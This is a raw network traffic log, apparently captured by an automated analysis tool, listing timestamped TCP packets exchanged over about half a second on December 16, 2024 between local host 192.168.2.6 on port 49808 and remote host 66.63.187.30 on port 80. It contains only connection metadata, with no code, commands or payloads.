                                                                                                  Dec 16, 2024 17:04:58.749921083 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.749978065 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.750071049 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.758277893 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.758327961 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.758336067 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.758446932 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.766896963 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.766947031 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.766977072 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.767016888 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.775377035 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.775432110 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.775500059 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.775542974 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.784298897 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.784367085 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.784459114 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.784506083 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.791944027 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.792002916 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.902636051 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.902728081 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.902733088 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.902775049 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.903907061 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.903987885 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.904067993 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.904181957 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.909848928 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.909887075 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.909917116 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.909940004 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.912290096 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.912338018 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.912416935 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.912455082 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.917186022 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.917237997 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.917243004 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.917285919 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.921925068 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.921972036 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.922003031 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.922055960 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.926906109 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.926970005 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.927050114 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.927103043 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.931490898 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.931530952 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.931710005 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.931768894 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.936609983 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.936654091 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.936736107 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.936780930 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.941297054 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.941340923 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.941376925 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.941418886 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.946616888 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.946631908 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.946660995 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.946681976 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.951150894 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.951244116 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.951286077 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.956180096 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.956274033 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.956423044 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.956470013 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.961173058 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.961225033 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.961366892 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.961405993 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.966397047 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.966475964 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.966562033 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.966772079 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.971925020 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.971977949 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.972048044 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.972095013 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.976269960 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.976331949 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.976387024 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.976423979 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.980788946 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.980844021 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.980884075 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.980946064 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.985246897 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.985313892 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.985340118 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.985377073 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.990236044 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.990289927 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.990438938 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.990506887 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.995031118 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.995078087 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:58.995093107 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:58.995129108 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.023044109 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.023091078 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.023106098 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.023133039 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.096690893 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.096726894 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.096762896 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.096791029 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.098740101 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.098792076 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.098824024 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.098875046 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.102475882 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.102540970 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.102653980 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.102705002 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.106170893 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.106229067 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.106309891 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.106359005 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.109800100 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.109901905 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.109935045 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.110044956 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.113424063 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.113482952 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.113578081 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.113691092 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.116548061 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.116614103 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.116626978 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.116686106 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.119785070 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.119899035 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.119925976 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.119982958 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.123230934 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.123295069 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.123320103 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.123367071 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.126718998 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.126763105 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.126768112 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.126817942 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.129856110 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.129956007 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.129981995 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.130037069 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.133351088 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.133439064 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.133656979 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.136842966 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.136914015 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.137191057 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.137253046 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.140079021 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.140165091 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.140196085 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.140259027 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.143440008 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.143498898 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.143558025 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.143639088 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.147042036 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.147104979 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.147138119 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.147301912 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.150377035 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.150448084 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.150481939 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.150573015 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.152335882 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.152394056 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.152431011 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.152484894 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.154503107 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.154592991 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.154655933 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.156173944 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.156236887 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.156263113 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.156286001 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.158361912 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.158442974 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.158658028 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.159014940 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.160034895 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.160145044 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.160212040 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.160309076 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.161995888 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.162127972 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.162137032 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.162271976 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.163902998 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.164007902 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.164057016 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.164057016 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.165908098 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.166008949 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.166017056 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.166076899 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.167924881 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.167979002 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.168008089 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.168131113 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.169954062 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.170022011 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.170042038 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.170088053 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.171892881 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.171993971 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.172014952 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.172148943 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.173727989 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.173794031 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.173825979 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.173878908 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.175857067 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.175915956 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.175930023 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.176062107 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.177901983 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.177983046 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.178056955 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.178056955 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.179605007 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.179703951 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.179784060 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.179836988 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.181701899 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.181818962 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.181860924 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.181860924 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.183548927 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.183593035 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.183677912 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.183722019 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.185993910 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.186148882 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.286676884 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.286793947 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.286828995 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.286828995 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.287708998 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.287760019 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.287786007 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.287878990 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.289634943 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.289700985 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.289769888 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.289813042 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.291690111 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.291748047 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.291812897 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.291867971 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.293951988 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.294013977 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.294045925 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.294213057 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.295562029 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.295628071 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.295665026 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.295717001 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.297374964 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.297441006 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.297514915 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.299331903 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.299427986 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.299485922 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.299576998 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.299626112 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.301265955 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.301327944 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.301362991 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.301455021 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.302871943 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.302934885 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.302942991 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.302985907 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.304657936 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.304709911 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.304730892 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.304791927 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.306415081 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.306483984 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.306602001 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.306647062 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.308211088 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.308254957 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.308273077 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.308310032 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.309622049 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.309669018 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.309783936 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.309901953 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.311269045 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.311331034 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.311367035 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.311714888 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.312922001 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.312978029 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.313039064 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.313184977 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.314642906 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.314685106 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.314749956 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.314848900 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.316345930 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.316402912 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.316463947 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.316505909 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.318116903 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.318181992 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.318212032 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.318336010 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.319545984 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.319600105 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.319636106 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.319747925 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.321214914 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.321269035 CET4980880192.168.2.666.63.187.30
